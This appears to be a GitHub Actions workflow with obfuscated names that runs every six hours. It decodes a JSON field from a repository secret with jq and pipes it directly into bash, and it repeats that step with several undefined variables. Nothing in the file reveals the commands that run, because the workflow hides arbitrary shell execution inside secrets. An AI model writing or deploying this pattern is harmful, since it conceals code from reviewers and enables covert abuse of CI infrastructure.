name: yuantanzhanxian

on:
  workflow_dispatch:
  schedule:
    - cron: '5 3/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: yuantanzhanxian
        env:
          a4: ${{ secrets.a4 }}
        run: |
          echo $a4 | jq -r .agtbc2253 | /bin/bash
          echo $spje03374 | jq -r .fldt654 | /bin/bash
          echo $ky65888 | jq -r .gkjxe0182 | /bin/bash
          echo $ioyjn96 | jq -r .b78 | /bin/bash
          echo $nqysf8 | jq -r .zqcov620 | /bin/bash
          echo $cl074 | jq -r .ox3 | /bin/bash
          echo $lzkh9 | jq -r .olka7899 | /bin/bash
          echo $vfp2000 | jq -r .prh8133 | /bin/bash

